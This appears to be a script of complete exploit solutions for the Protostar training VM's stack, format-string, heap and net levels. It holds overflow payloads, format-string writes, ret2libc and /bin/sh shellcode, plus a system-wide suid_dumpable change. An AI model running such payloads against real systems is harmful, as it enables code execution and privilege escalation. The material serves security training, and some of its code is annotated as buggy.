Protostar Stack Overflow (0-7), Format String (0-4), Heap Overflow (0-3) and Net (0-2)
# Scratch directory for the generated helper script (never cleaned up).
export TMP=$(mktemp -d)
# Unquoted delimiter: the shell expands $… and backslash pairs inside the body
# before Python sees it. The '\\\' literal in x() below appears to rely on
# this rewriting; the later scripts use a quoted delimiter instead.
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 0 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x):
    """Pack *x* as one native-endian, native-size unsigned int (4 bytes on common platforms)."""
    packer = struct.Struct('I')
    return packer.pack(x)
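def x(s):
    """Return a printable escape form of the byte string *s*.

    Each byte becomes a backslash, the letter x and two lowercase hex
    digits, so the result can be pasted back into a Python literal.
    Accepts a Python 2 str or a bytes/bytearray object. Not used by the
    payload below; kept as a debugging helper.
    """
    # chr(92) is a backslash. It is spelled this way on purpose: this source
    # is written through an unquoted heredoc, which would rewrite a literal
    # backslash escape before Python ever parses it.
    backslash = chr(92)
    # bytearray() yields ints on both Python 2 and 3, so no .encode("hex").
    return ''.join('%sx%02x' % (backslash, byte) for byte in bytearray(s))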
# Width handed to the %c directive; the packed FLAG follows it in the output.
OFFSET = 64
FLAG = 0xdeadbeef
# Python 2: p() returns a str, so it interpolates as raw bytes. Nothing here
# contains characters the (unquoted) heredoc would expand.
payload = '%{offset}c{flag}'.format(offset=OFFSET,
                                    flag=p(FLAG))
# Python 2 print statement; the script is not Python 3 compatible.
print payload
EOF
# Needs a Python 2 interpreter on PATH. Unquoted $(...) is word-split and
# glob-expanded before format0 sees it; the later scripts quote it.
./format0 $(python ${TMP}/exploit.py)
# Scratch directory for the generated helper script (never cleaned up).
export TMP=$(mktemp -d)
# Quoted delimiter: the body is written out verbatim, no shell expansion.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 1 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x):
    """Pack *x* as one native-endian, native-size unsigned int (4 bytes on common platforms)."""
    packer = struct.Struct('I')
    return packer.pack(x)
PTR = 0x8049638
# Offset probe from the write-up (a shell loop, kept for reference):
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format1 'AAAA%'$i'$08x')"; done | grep AAAA41414141
# trying 143 - AAAA41414141
OFFSET = 143
# Python 2: p(PTR) is a 4-byte str. The '$' survives because the heredoc
# delimiter is quoted.
payload = '{ptr}%{offset}$08n'.format(ptr=p(PTR), offset=OFFSET)
# Python 2 print statement; not Python 3 compatible.
print payload
EOF
# Quoted so the payload stays a single argument; needs a Python 2 interpreter.
/opt/protostar/bin/format1 "$(python ${TMP}/exploit.py)"
# Scratch directory for the generated helper script (never cleaned up).
export TMP=$(mktemp -d)
# Quoted delimiter: the body is written out verbatim, no shell expansion.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 2 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x):
    """Pack *x* as one native-endian, native-size unsigned int (4 bytes on common platforms)."""
    packer = struct.Struct('I')
    return packer.pack(x)
PTR = 0x80496e4
# Offset probe from the write-up (a shell loop, kept for reference):
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format2 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 4 - AAAA41414141
OFFSET = 4
# Python 2: p(PTR) is a 4-byte str. The '$' survives because the heredoc
# delimiter is quoted.
payload = '{ptr}%60x%{offset}$08n'.format(ptr=p(PTR), offset=OFFSET)
# Python 2 print statement; not Python 3 compatible.
print payload
EOF
# Here-string: the payload goes to stdin with a trailing newline appended.
/opt/protostar/bin/format2 <<<"$(python ${TMP}/exploit.py)"
# Scratch directory for the generated helper script (never cleaned up).
export TMP=$(mktemp -d)
# Quoted delimiter: the body is written out verbatim, no shell expansion.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 3 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x):
    """Pack *x* as one native-endian, native-size unsigned int (4 bytes on common platforms)."""
    packer = struct.Struct('I')
    return packer.pack(x)
PTR = 0x80496f4
# Offset probe from the write-up (a shell loop, kept for reference):
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format3 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 12 - AAAA41414141
OFFSET = 12
FLAG = 0x01025544
# Split FLAG to LSB & MSB
# Python 2 only: hex() may append an 'L' suffix for longs, and the '/' in the
# slices below is integer division (a float index raises on Python 3).
FLAG = hex(FLAG).split('0x')[1].split('L')[0].zfill(8)
# Despite the name this is digits 0-3 of the 8-digit string, i.e. the upper
# 16 bits; MSB below is digits 4-7, the lower 16 bits.
LSB = FLAG[- (len(FLAG)):- (len(FLAG) / 2)]
LSB = int(LSB, 16)
MSB = FLAG[- (len(FLAG) / 2):]
MSB = int(MSB, 16)
# Both values are reused as printf field widths in the payload below.
LSB += 65536
LSB -= MSB
MSB -= 0x8 # -0x8 because of len(hex(MSB).split('0x')[1] + hex(LSB).split('0x')[1])
# Python 2: p() returns str, so the pieces concatenate as raw bytes.
payload = '{ptr}{ptr_2}%{msb}x%{offset}$08n%{lsb}x%{offset_1}$08n'.format(ptr=p(PTR), ptr_2=p(PTR + 2), msb=MSB, offset=OFFSET, lsb=LSB, offset_1=OFFSET + 1)
# Python 2 print statement; not Python 3 compatible.
print payload
EOF
# Here-string: the payload goes to stdin with a trailing newline appended.
/opt/protostar/bin/format3 <<<"$(python ${TMP}/exploit.py)"
# Scratch directory for the generated helper script (never cleaned up).
export TMP=$(mktemp -d)
# Quoted delimiter: the body is written out verbatim, no shell expansion.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 4 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x):
    """Pack *x* as one native-endian, native-size unsigned int (4 bytes on common platforms)."""
    packer = struct.Struct('I')
    return packer.pack(x)
# Addresses were read with objdump (commands kept inline); they are specific
# to this build of the binary.
PTR = 0x8049724 # objdump -d ./format4 | grep -P -A1 "^[0-9a-f]+ <exit@plt>:"
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format4 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 4 - AAAA41414141
OFFSET = 4
FLAG = 0x80484b4 # objdump -d ./format4 | grep -P "^[0-9a-f]+ <hello>:"
# Split FLAG to LSB & MSB
# Python 2 only: hex() may append an 'L' suffix for longs, and the '/' in the
# slices below is integer division (a float index raises on Python 3).
FLAG = hex(FLAG).split('0x')[1].split('L')[0].zfill(8)
# Despite the name this is digits 0-3 of the 8-digit string, i.e. the upper
# 16 bits; MSB below is digits 4-7, the lower 16 bits.
LSB = FLAG[- (len(FLAG)):- (len(FLAG) / 2)]
LSB = int(LSB, 16)
MSB = FLAG[- (len(FLAG) / 2):]
MSB = int(MSB, 16)
# Both values are reused as printf field widths in the payload below.
LSB += 65536
LSB -= MSB
MSB -= 0x8 # -0x8 because of len(hex(MSB).split('0x')[1] + hex(LSB).split('0x')[1])
# Python 2: p() returns str, so the pieces concatenate as raw bytes.
payload = '{ptr}{ptr_2}%{msb}x%{offset}$08n%{lsb}x%{offset_1}$08n'.format(ptr=p(PTR), ptr_2=p(PTR + 2), msb=MSB, offset=OFFSET, lsb=LSB, offset_1=OFFSET + 1)
# Python 2 print statement; not Python 3 compatible.
print payload
EOF
# Here-string: the payload goes to stdin with a trailing newline appended.
/opt/protostar/bin/format4 <<<"$(python ${TMP}/exploit.py)"
# All payloads come from Python 2's print (str escapes are emitted as raw
# bytes); the addresses are specific to this build and assume a layout that
# does not change between runs.
./heap0 "$(python -c "print('A'*76 + 'B'*4 + '\x64\x84\x04\x08')")"
# gdb notes from the write-up, kept as comments.
# x/16wx 0x804a160 - 4
#
# i1 = 0x804a160
# i1->name = 0x804a170
# i2 = 0x804a180
# i2->name = 0x804a190
#
# objdump -d ./heap1 | grep -P -A1 "^[0-9a-f]+ <puts@plt>:"
# 080483cc <puts@plt>:
# 80483cc: ff 25 74 97 04 08 jmp *0x8049774
# The single space inside the payload relies on the unquoted $(...) being
# word-split into two argv entries — intentional, but it also means glob
# characters in the output would be expanded.
./heap1 $(python -c "print('A'*16 + 'B'*4 + '\x74\x97\x04\x08' + ' ' + '\x94\x84\x04\x08')")
# Commands are fed on stdin, one per line ("\n" is interpreted by Python).
python -c "print('auth test\nreset\nservice ' + 'A'*16 + '\nlogin')" | ./heap2
# gdb notes from the write-up (r = run, x = examine, q = quit), kept as comments.
# a = 0x804c008
# b = 0x804c030
# c = 0x804c058
#
# b * 0x804890e
# r $(python -c "print('A'*16 + '\xbb\x64\x88\x04\x08\xff\xd3' + ' ' + 'B'*36 + '\x59' + ' ' + 'C'*80 + '\xfc\xff\xff\xff'*2 + '\x1c\xb1\x04\x08' + '\x18\xc0\x04\x08')")
# x/60wx 0x804c000
# q
# As for heap1: the spaces in the payload are split into three argv entries
# by the unquoted $(...).
./heap3 $(python -c "print('A'*16 + '\xbb\x64\x88\x04\x08\xff\xd3' + ' ' + 'B'*36 + '\x59' + ' ' + 'C'*80 + '\xfc\xff\xff\xff'*2 + '\x1c\xb1\x04\x08' + '\x18\xc0\x04\x08')")
# Scratch directory for the generated helper script (never cleaned up).
export TMP=$(mktemp -d)
# Quoted delimiter: the body is written out verbatim, no shell expansion.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar net 0 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
from pwn import * | |
import struct | |
# Set to True to echo the raw server data at each step (see the prints below).
DEBUG = False
def p(x):
    """Pack *x* as a little-endian unsigned 32-bit value (4 bytes)."""
    packer = struct.Struct('<I')
    return packer.pack(x)
# Hard-coded lab VM address and port.
r = remote('192.168.204.3', 2999)
# Receive and extract challenge
# data = r.recvuntil('32bit int\n', drop=False)
# On timeout this returns an empty string rather than raising.
data = r.recvline_pred(lambda line: '32bit int\n' in line, keepends=False, timeout=1)
if DEBUG: print(data)
# `re` is not imported explicitly here; presumably it arrives via
# `from pwn import *`. The '"'"' fragments are literal (quoted heredoc), so
# Python concatenates the adjacent literals into one pattern with single
# quotes around the captured integer.
data = re.match(r'Please send '"'"'(?P<integer>[0-9]+)'"'"'[^\n]+32bit int', data)
if DEBUG: print(data)
# Solve Challenge
# NOTE(review): re.match returns None when the banner does not match (or
# timed out), so this line fails with AttributeError rather than a clear error.
integer = int(data.group('integer'), 10)
r.send(p(integer))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
# Needs a Python interpreter with pwntools installed.
python ${TMP}/exploit.py
# Scratch directory for the generated helper script (never cleaned up).
export TMP=$(mktemp -d)
# Quoted delimiter: the body is written out verbatim, no shell expansion.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar net 1 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
from pwn import * | |
import struct | |
# Set to True to echo the raw server data (see the print below).
DEBUG = False
def u(x):
    """Unpack *x* (exactly four bytes) as a little-endian unsigned 32-bit int.

    struct.error is raised for any other length.
    """
    (value,) = struct.unpack('<I', x)
    return value
# Hard-coded lab VM address and port.
r = remote('192.168.204.3', 2998)
# Receive and extract challenge
data = r.recv(1024, timeout=1)
if DEBUG: print(data)
# Solve Challenge
# u() needs exactly four bytes (struct.unpack raises otherwise), so this
# assumes the challenge value arrives alone; str() yields its decimal form.
r.send(str(u(data)))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
# Needs a Python interpreter with pwntools installed.
python ${TMP}/exploit.py
# Scratch directory for the generated helper script (never cleaned up).
export TMP=$(mktemp -d)
# Quoted delimiter: the body is written out verbatim, no shell expansion.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar net 2 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
from pwn import * | |
import struct | |
# NOTE(review): assigned but never read in this script (no `if DEBUG:` below).
DEBUG = True
def p(x):
    """Pack *x* as a little-endian unsigned 64-bit value (8 bytes)."""
    packer = struct.Struct('<Q')
    return packer.pack(x)
def u(x):
    """Unpack *x* (exactly four bytes) as a little-endian unsigned 32-bit int.

    struct.error is raised for any other length.
    """
    (value,) = struct.unpack('<I', x)
    return value
# Hard-coded lab VM address and port.
r = remote('192.168.204.3', 2997)
# NOTE(review): shadows the builtin sum(); harmless here but worth renaming.
sum = 0
for _ in range(4):
    # Receive and extract challenge
    # recv(4) may return fewer than four bytes on a short read, in which case
    # u() raises struct.error.
    data = r.recv(4, timeout=1)
    integer = u(data)
    sum += integer
# Solve Challenge
# Sent as an 8-byte little-endian value (p packs '<Q'), wider than the four
# 32-bit inputs — presumably what the service expects; confirm against it.
r.send(p(sum))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
# Needs a Python interpreter with pwntools installed.
python ${TMP}/exploit.py
# Payloads come from Python 2's print (str escapes are raw bytes). `< <(...)`
# feeds stdin, `$(...)` the argument vector, GREENIE= the environment.
./stack0 < <(python -c "print('A'*64 + 'abcd')")
./stack1 $(python -c "print('A'*64 + 'dcba')")
GREENIE=$(python -c "print('A'*64 + '\x0a\x0d\x0a\x0d')") ./stack2
# Prints the address from the symbol table; the literal on the next line was
# copied from it and must match this build of the binary.
nm stack3 | grep win | awk '{print $1}'
./stack3 < <(python -c "print('A'*64 + '\x24\x84\x04\x08')")
nm stack4 | grep win | awk '{print $1}'
./stack4 < <(python -c "print('A'*64 + 'B'*12 + '\xf4\x83\x04\x08')")
# Interactive gdb session (patts is a peda command); the r/x/q lines are gdb
# input. NOTE(review): `./stack` is presumably a typo for `./stack5`.
gdb -q ./stack
r < <(echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA')
patts
# NOTE(review): the quotes are unbalanced here — the closing '"' sits before
# the last ')' of the Python call; compare the ./stack5 line at the end.
r < <(python -c "print('A'*72 + 'B'*4 + '\x90'*16 + 'C'*120"))
x/12s $esp
q
# NOTE(review): this is a system-wide setting (needs root) that lets crashing
# set-uid processes write their memory to disk, which can expose privileged
# data; restore the previous value (the usual default is 0) when finished.
echo 2 >/proc/sys/fs/suid_dumpable
ulimit -c unlimited
# Locate, decompress and load the core produced by the crash above.
coredumpctl list | grep stack5
coredumpctl info 31926
lz4 -d /var/lib/systemd/coredump/core.stack5.0.3af47fde515940c38b4d6b149658d40d.31926.1528717935000000.lz4
gdb -q ./stack5 -c /var/lib/systemd/coredump/core.stack5.0.3af47fde515940c38b4d6b149658d40d.31926.1528717935000000
x/12s $esp
q
# Hard-coded stack address: only meaningful while the layout is identical
# between runs (no ASLR, same environment size).
./stack5 < <(python -c "print('A'*76 + '\xf0\xcb\xff\xff' + '\x90'*16 + '\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x12\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x20\x79\x30\x75\x20\x73\x70\x33\x34\x6b\x20\x31\x33\x33\x37\x20\x3f\x20')")
# TMP is exported on purpose: the 'r <${TMP}/inp' below is single-quoted, so
# it is expanded by the shell that gdb spawns, not by this script.
export TMP=$(mktemp -d)
# pattc/patto are peda commands.
PATTERN=$(gdb -q ./stack6 -ex 'pattc 512' -ex 'q' | awk -F"'" '{print $2}' | tail -n+2)
# NOTE(review): bash's builtin echo does not interpret "\n" without -e, so
# the file ends with a literal backslash-n rather than a newline.
echo "${PATTERN}\n" >${TMP}/inp
OFFSET=$(gdb -q ./stack6 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}')
# Addresses are read from a live process and baked into the generated script;
# they are only stable while the layout does not change between runs (no ASLR).
SYSTEM=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'p system' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
EXIT=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'p exit' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
LIBC=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'info proc map' -ex 'q' | grep 'libc' | awk '{print $1" "$2}' | grep -Eo '0x[A-Fa-f0-9]+ 0x[A-Fa-f0-9]+' | head -n1 | perl -p -e 's/\n//')
SH=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'find "/bin/sh" '"${LIBC}" -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
# Unquoted delimiter on purpose: the SYSTEM, EXIT, OFFSET and SH variables are
# substituted into the Python source.
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar stack 6 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x):
    """Pack *x* as one native-endian, native-size unsigned int (4 bytes on common platforms)."""
    packer = struct.Struct('I')
    return packer.pack(x)
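def x(s):
    """Return a printable escape form of the byte string *s*.

    Each byte becomes a backslash, the letter x and two lowercase hex
    digits, so the result can be pasted back into a Python literal.
    Accepts a Python 2 str or a bytes/bytearray object. Not used by the
    payload below; kept as a debugging helper.
    """
    # chr(92) is a backslash. It is spelled this way on purpose: this source
    # is written through an unquoted heredoc, which would rewrite a literal
    # backslash escape before Python ever parses it.
    backslash = chr(92)
    # bytearray() yields ints on both Python 2 and 3, so no .encode("hex").
    return ''.join('%sx%02x' % (backslash, byte) for byte in bytearray(s))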
# These four values are substituted by the shell when the heredoc is written
# (unquoted delimiter), so the generated file contains literal numbers.
SYSTEM = ${SYSTEM}
EXIT = ${EXIT}
OFFSET = ${OFFSET}
SH = ${SH}
# Python 2: p() returns str, so the pieces concatenate as raw bytes.
payload = '{smash}{system}{exit}{sh}'.format(smash='A'*OFFSET,
                                             system=p(SYSTEM),
                                             exit=p(EXIT),
                                             sh=p(SH))
# Python 2 print statement; not Python 3 compatible.
print payload
EOF
# cat appends stdin ("-") after the payload so the program's stdin stays open
# for interactive input afterwards. Needs a Python 2 interpreter.
/bin/cat <(python ${TMP}/exploit.py) - | ./stack6
# Interactive gdb session; the disassembly excerpt is kept as comments.
# NOTE(review): the address used later (POP2RET = 0x80485f7) is not the
# 0x08048492 shown here; presumably taken from a different function — confirm.
gdb -q ./stack7
disas __do_global_dtors_aux
# [..snip..]
# 0x08048492 <+82>: pop ebx
# 0x08048493 <+83>: pop ebp
# 0x08048494 <+84>: ret
# [..snip..]
q
# TMP is exported on purpose: the 'r <${TMP}/inp' below is single-quoted, so
# it is expanded by the shell that gdb spawns, not by this script.
export TMP=$(mktemp -d)
# pattc/patto are peda commands.
PATTERN=$(gdb -q ./stack7 -ex 'pattc 512' -ex 'q' | awk -F"'" '{print $2}' | tail -n+2)
# NOTE(review): bash's builtin echo does not interpret "\n" without -e, so
# the file ends with a literal backslash-n rather than a newline.
echo "${PATTERN}\n" >${TMP}/inp
OFFSET=$(gdb -q ./stack7 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}')
# Unquoted delimiter on purpose: OFFSET is substituted into the Python source.
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar stack 7 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x):
    """Pack *x* as one native-endian, native-size unsigned int (4 bytes on common platforms)."""
    packer = struct.Struct('I')
    return packer.pack(x)
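def x(s):
    """Return a printable escape form of the byte string *s*.

    Each byte becomes a backslash, the letter x and two lowercase hex
    digits, so the result can be pasted back into a Python literal.
    Accepts a Python 2 str or a bytes/bytearray object. Not used by the
    payload below; kept as a debugging helper.
    """
    # chr(92) is a backslash. It is spelled this way on purpose: this source
    # is written through an unquoted heredoc, which would rewrite a literal
    # backslash escape before Python ever parses it.
    backslash = chr(92)
    # bytearray() yields ints on both Python 2 and 3, so no .encode("hex").
    return ''.join('%sx%02x' % (backslash, byte) for byte in bytearray(s))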
# Substituted by the shell when the heredoc is written (unquoted delimiter).
OFFSET = ${OFFSET}
# NOTE(review): differs from the 0x08048492 sequence shown in the gdb session
# above; presumably taken from another function — confirm against the binary.
POP2RET = 0x80485f7
EBX = '\x90'*4
EBP = '\x90'*4
# Hard-coded stack address: only meaningful while the layout is identical
# between runs (no ASLR, same environment size).
SHELLCODE_PTR = 0xffffcbcc
SHELLCODE = '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'
# Python 2: p() and the literals above are str, so they concatenate as raw bytes.
payload = '{smash}{pop2ret}{ebx}{ebp}{shellcode_ptr}{shellcode}'.format(smash='A'*OFFSET,
                                                                       pop2ret=p(POP2RET), # pop ebx ; pop ebp ;;
                                                                       ebx=EBX, # ebx
                                                                       ebp=EBP, # ebp
                                                                       shellcode_ptr=p(SHELLCODE_PTR),
                                                                       shellcode=SHELLCODE)
# Python 2 print statement; not Python 3 compatible.
print payload
EOF
# cat appends stdin ("-") after the payload so the program's stdin stays open
# for interactive input afterwards. Needs a Python 2 interpreter.
/bin/cat <(python ${TMP}/exploit.py) - | ./stack7